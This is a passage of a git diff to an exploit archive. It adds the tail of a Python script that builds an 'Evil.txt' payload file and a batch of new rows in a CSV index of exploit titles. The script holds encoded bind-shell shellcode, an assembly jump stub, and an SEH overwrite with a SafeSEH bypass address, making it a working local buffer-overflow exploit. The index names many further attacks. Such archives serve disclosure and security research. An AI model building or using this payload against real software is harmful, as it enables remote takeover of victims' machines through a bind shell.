+shellcode += "\xe4\xf2\x42\xca\xa1\xc5\x9a\x9e\x5f\x7f\x35\xbc"
+shellcode += "\x9d\x19\x7e\x04\x7a\xda\x81\x85\x0f\x66\xa6\x95"
+shellcode += "\xc9\x67\xe2\xc1\x85\x31\xbc\xbf\x63\xe8\x0e\x69"
+shellcode += "\x3a\x47\xd9\xfd\xbb\xab\xda\x7b\xc4\xe1\xac\x63"
+shellcode += "\x75\x5c\xe9\x9c\xba\x08\xfd\xe5\xa6\xa8\x02\x3c"
+shellcode += "\x63\xd8\x48\x1c\xc2\x71\x15\xf5\x56\x1c\xa6\x20"
+shellcode += "\x94\x19\x25\xc0\x65\xde\x35\xa1\x60\x9a\xf1\x5a"
+shellcode += "\x19\xb3\x97\x5c\x8e\xb4\xbd"
+
+magic  = '\xd9\xee'                             # fldz
+magic += '\xd9\x74\x24\xf4'                     # fnstenv [esp-0xc]
+magic += '\x59'                                 # pop ecx
+magic += '\x80\xc1\x05'                         # add cl,0x5
+magic += '\x80\xc1\x05'                         # add cl,0x5
+magic += '\x90'                                 # nop
+magic += '\xfe\xcd'                             # dec ch
+magic += '\xfe\xcd'                             # dec ch
+magic += '\xff\xe1'                             # jmp ecx 
+
+buffer  = '\x90' * 28                           # nops
+buffer += shellcode                             # bind shell
+buffer += '\xcc' * (516-28-len(shellcode))      # filler to nSEH 
+buffer += '\x75\x06\x74\x06'                    # nSEH | jump net
+buffer += '\x18\x05\xfc\x7f'                    # SEH  | 0x7ffc0518 : pop edi # pop edi # ret  [SafeSEH Bypass]
+buffer += '\x90' * 5                            # nops 
+buffer += magic                                 # jump -512
+buffer += '\xcc' * (3000-516-4-4-5-len(magic))  # junk
+
+try:
+	f=open("Evil.txt","w")
+	print "[+] Creating %s bytes evil payload.." %len(buffer)
+	f.write(buffer)
+	f.close()
+	print "[+] File created!"
+except Exception as e:
+	print e
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 501b93d3d..f1e03f75a 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -5986,6 +5986,7 @@ id,file,description,date,author,type,platform,port
 44802,exploits/linux/dos/44802.py,"Siemens SIMATIC S7-300 CPU - Remote Denial of Service",2018-05-30,t4rkd3vilz,dos,linux,
 44817,exploits/windows/dos/44817.js,"Microsoft Edge Chakra - EntrySimpleObjectSlotGetter Type Confusion",2018-05-31,"Google Security Research",dos,windows,
 44821,exploits/multiple/dos/44821.txt,"Epiphany 3.28.2.1 - Denial of Service",2018-06-01,"Dhiraj Mishra",dos,multiple,
+44832,exploits/linux/dos/44832.txt,"Linux Kernel < 4.16.11 - 'ext4_read_inline_data()' Memory Corruption",2018-06-05,"Google Security Research",dos,linux,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -9756,7 +9757,12 @@ id,file,description,date,author,type,platform,port
 44819,exploits/hardware/local/44819.js,"Sony Playstation 4 (PS4) 5.1 - Kernel (PoC)",2018-05-28,qwertyoruiop,local,hardware,
 44820,exploits/hardware/local/44820.txt,"Sony Playstation 3 (PS3) 4.82 - 'Jailbreak' (ROP)",2018-01-28,PS3Xploit,local,hardware,
 44828,exploits/windows/local/44828.py,"Zip-n-Go 4.9 - Buffer Overflow (SEH)",2018-06-04,"Hashim Jawad",local,windows,
-44830,exploits/windows/local/44830.rb,"Windows - UAC Protection Bypass (Via Slui File Handler Hijack) (Metasploit)",2018-06-04,Metasploit,local,windows,
+44830,exploits/windows/local/44830.rb,"Microsoft Windows - UAC Protection Bypass (Via Slui File Handler Hijack) (Metasploit)",2018-06-04,Metasploit,local,windows,
+44834,exploits/windows/local/44834.py,"Clone2GO Video converter 2.8.2 - Buffer Overflow",2018-06-05,"Gokul Babu",local,windows,
+44838,exploits/windows_x86/local/44838.py,"10-Strike Network Inventory Explorer 8.54 - Local Buffer Overflow (SEH)",2018-06-05,"Hashim Jawad",local,windows_x86,
+44840,exploits/windows_x86/local/44840.py,"10-Strike Network Inventory Explorer 8.54 - 'Registration Key' Buffer Overflow (SEH)",2018-06-05,"Hashim Jawad",local,windows_x86,
+44841,exploits/windows_x86/local/44841.py,"10-Strike Network Scanner 3.0 - Local Buffer Overflow (SEH)",2018-06-05,"Hashim Jawad",local,windows_x86,
+44842,exploits/linux/local/44842.txt,"WebKitGTK+ < 2.21.3 - Crash (PoC)",2018-06-05,"Dhiraj Mishra",local,linux,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -16543,6 +16549,7 @@ id,file,description,date,author,type,platform,port
 44784,exploits/windows_x86-64/remote/44784.py,"CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass)",2018-05-28,"Juan Prescotto",remote,windows_x86-64,
 44822,exploits/linux/remote/44822.txt,"Git < 2.17.1 - Remote Code Execution",2018-06-01,JameelNabbo,remote,linux,
 44829,exploits/linux/remote/44829.py,"CyberArk < 10 - Memory Disclosure",2018-06-04,"Thomas Zuk",remote,linux,
+44836,exploits/ios/remote/44836.rb,"WebKit - not_number defineProperties UAF (Metasploit)",2018-06-05,Metasploit,remote,ios,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -39495,4 +39502,8 @@ id,file,description,date,author,type,platform,port
 44825,exploits/php/webapps/44825.html,"GreenCMS 2.3.0603 - Cross-Site Request Forgery / Remote Code Execution",2018-06-03,xichao,webapps,php,
 44826,exploits/php/webapps/44826.html,"GreenCMS 2.3.0603 - Cross-Site Request Forgery (Add Admin)",2018-06-03,xichao,webapps,php,
 44827,exploits/java/webapps/44827.txt,"SearchBlox 8.6.7 - XML External Entity Injection",2018-06-04,"Ahmet Gurel",webapps,java,
-44831,exploits/aspx/webapps/44831.txt,"EMS Master Calendar < 8.0.0.20180520 - Reflected Cross-Site Scripting",2018-06-04,"Chris Barretto",webapps,aspx,
+44831,exploits/aspx/webapps/44831.txt,"EMS Master Calendar < 8.0.0.20180520 - Cross-Site Scripting",2018-06-04,"Chris Barretto",webapps,aspx,
+44833,exploits/php/webapps/44833.txt,"MyBB Recent Threads Plugin 1.0 - Cross-Site Scripting",2018-06-05,0xB9,webapps,php,
+44837,exploits/php/webapps/44837.py,"Pagekit < 1.0.13 - Cross-Site Scripting Code Generator",2018-06-05,DEEPIN2,webapps,php,
+44839,exploits/hardware/webapps/44839.md,"Brother HL Series Printers 1.15 - Cross-Site Scripting",2018-06-04,"Huy Kha",webapps,hardware,
+44843,exploits/linux/webapps/44843.py,"Jenkins Mailer Plugin < 1.20 - Cross-Site Request Forgery (Send Email)",2018-06-05,Kl3_GMjq6,webapps,linux,